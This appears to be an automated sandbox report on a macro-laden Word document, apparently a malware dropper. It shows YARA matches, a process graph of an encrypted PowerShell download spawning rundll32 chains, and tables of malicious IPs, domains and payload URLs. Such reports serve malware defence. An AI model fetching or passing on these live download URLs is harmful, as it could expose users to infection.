Source: Yara match File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 343979 Sample: N00048481397007.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Antivirus detection for URL or domain 2->74 76 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->76 78 11 other signatures 2->78 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 24 2->17         started        process3 signatures4 92 Suspicious powershell command line found 14->92 94 Very long command line found 14->94 96 Encrypted powershell cmdline option found 14->96 19 powershell.exe 16 11 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 64 traumfrauen-ukraine.de 212.227.200.73, 443, 49167, 49168 ONEANDONE-ASBrauerstrasse48DE Germany 19->64 66 nightlifemumbai.club 172.217.6.174, 49165, 80 GOOGLEUS United States 19->66 68 3 other IPs or domains 19->68 62 C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll, PE32 19->62 dropped 84 Powershell drops PE file 19->84 26 rundll32.exe 19->26         started        28 rundll32.exe 24->28         started        file7 signatures8 process9 process10 30 rundll32.exe 26->30         started        32 rundll32.exe 28->32         started        signatures11 35 rundll32.exe 2 30->35         started        70 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->70 38 rundll32.exe 32->38         started        process12 signatures13 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->80 40 rundll32.exe 35->40         started        42 rundll32.exe 38->42         started        process14 signatures15 45 rundll32.exe 1 40->45         started        88 Hides that the sample has been downloaded from the Internet (zone.identifier) 42->88 48 rundll32.exe 42->48         started        process16 signatures17 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->90 50 rundll32.exe 45->50         started        52 rundll32.exe 48->52         started        process18 signatures19 55 rundll32.exe 1 50->55         started        82 Hides that the sample has been downloaded from the Internet (zone.identifier) 52->82 58 rundll32.exe 52->58         started        process20 signatures21 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 55->86 60 rundll32.exe 55->60         started        process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.88.166
unknown United States
13335 CLOUDFLARENETUS true
192.0.78.20
unknown United States
2635 AUTOMATTICUS true
212.227.200.73
unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
172.217.6.174
unknown United States
15169 GOOGLEUS true
190.55.186.229
unknown Argentina
27747 TelecentroSAAR true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
traumfrauen-ukraine.de 212.227.200.73 true
nightlifemumbai.club 172.217.6.174 true
jflmktg.wpcomstaging.com 192.0.78.20 true
e-wdesign.eu unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true
  • Avira URL Cloud: malware
unknown
http://traumfrauen-ukraine.de/bin/JyeS/ true
  • Avira URL Cloud: safe
unknown
http://190.55.186.229/pvaadnb3/ true
  • Avira URL Cloud: safe
unknown